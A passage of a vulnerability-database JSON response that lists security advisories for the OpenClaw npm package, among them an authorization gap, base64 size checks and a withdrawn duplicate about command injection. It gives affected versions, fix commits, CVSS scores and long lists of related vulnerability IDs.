internal ACP chat commands missed the operator.admin gate that should separate read-only and mutating control-plane actions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `229426a257e49694a59fa4e3895861d02a4d767f`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/auto-reply/reply/commands-acp.ts now requires operator.admin for mutating internal ACP actions.\n- src/auto-reply/reply/commands-acp.test.ts ships regression coverage for non-admin denial and admin success cases.\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf"},{"reference_url":"https://github.com/advisories/GHSA-3w6x-gv34-mqpf","reference_id":"GHSA-3w6x-gv34-mqpf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3w6x-gv34-mqpf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-3w6x-gv34-mqpf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pgdr-mvc3-2kg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89157?format=json","vulnerability_id":"VCID-psms-gauf-tkbz","summary":"OpenClaw: Multiple Code Paths Missing Base64 Pre-Allocation Size Checks\n## Impact\n\nMultiple Code Paths Missing Base64 Pre-Allocation Size Checks.\n\nSeveral base64 decode paths could allocate before enforcing decoded-size limits.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42420","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16229","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16177","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1622","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42420"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42420","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42420"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation"},{"reference_url":"https://github.com/advisories/GHSA-ccx3-fw7q-rr2r","reference_id":"GHSA-ccx3-fw7q-rr2r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ccx3-fw7q-rr2r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42420","GHSA-ccx3-fw7q-rr2r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-psms-gauf-tkbz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91145?format=json","vulnerability_id":"VCID-q38j-b9g9-8yar","summary":"Duplicate Advisory: OpenClaw: WebSocket shared-auth connections could self-declare elevated scopes\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-7fcc-cw49-xm78. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to 2026.2.19 contain a command injection vulnerability in the Lobster extension tool execution that uses Windows shell fallback with shell: true after spawn failures. Attackers can inject shell metacharacters in command arguments to execute arbitrary commands when subprocess launch fails with EINVAL or ENOENT errors.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/ba7be018da354ea9f803ed356d20464df0437916","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ba7be018da354ea9f803ed356d20464df0437916"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-command-injection-via-windows-shell-fallback-in-lobster-tool-execution","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-command-injection-via-windows-shell-fallback-in-lobster-tool-execution"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32000","reference_id":"CVE-2026-32000","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32000"},{"reference_url":"https://github.com/advisories/GHSA-5rp4-cwgh-gvwq","reference_id":"GHSA-5rp4-cwgh-gvwq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5rp4-cwgh-gvwq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7fcc-cw49-xm78","reference_id":"GHSA-7fcc-cw49-xm78","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7fcc-cw49-xm78"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9sm